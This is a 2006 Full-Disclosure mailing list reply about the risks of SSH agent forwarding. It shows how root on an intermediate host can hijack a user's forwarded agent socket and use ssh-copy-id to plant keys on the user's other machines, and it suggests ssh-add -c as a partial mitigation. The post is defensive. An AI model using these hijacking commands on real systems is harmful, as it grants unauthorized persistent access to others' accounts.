From: Andrew McGill (andrew2005ledge.co.za)
Date: Fri Feb 24 2006 - 05:53:52 CST

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wednesday Feb 22, 2006 around 1:37pm, Steve Friedl wrote,

> Hello all,
>
> While trying to convince a customer that he really needs to get away
> from password auth on his SSH servers, I ended up diving in to make
> some detailed notes on how key agents and forwarding work. The outcome
> of this was a new Tech Tip which explains it in some detail:
>
> Unixwiz.net Tech Tip: An Illustrated Guide to SSH Agent Forwarding
> http://www.unixwiz.net/techtips/ssh-agent-forwarding.html
>
> I hope some find this helpful.
>
> Regards,
> Steve

Here's something you missed in the "Cons" section of agent
forwarding:

  lalalocal: ssh-add
  lalalocal: (enter key)
  lalalocal: ssh -A customer

    lalacustomer: ssh remote

      lalaremote: sleep 86400

And while you are sleeping:
  rootcustomer does this:
        export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*' | head -1`
        ssh-copy-id lalaremote
        ssh-copy-id lalalocal
        ssh-copy-id lalaothercustomer
        ssh-copy-id lalalalaland

(Oops) (that's a lot easier than subverting ssh to insert
something evil into the stream that will hack into the remote)

If there are untrusted machines involved you may prefer this:

  ssh-add -c

Note that ssh-agent does not identify the origin of requests for
authentication (a bug?), so its confirmation is not fail-safe.

&:-)

--
Leading Edge Business Solutions +27 11 656 0360
Linux Training, Software and Networking http://ledge.co.za/

Linux - laai niks anders
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]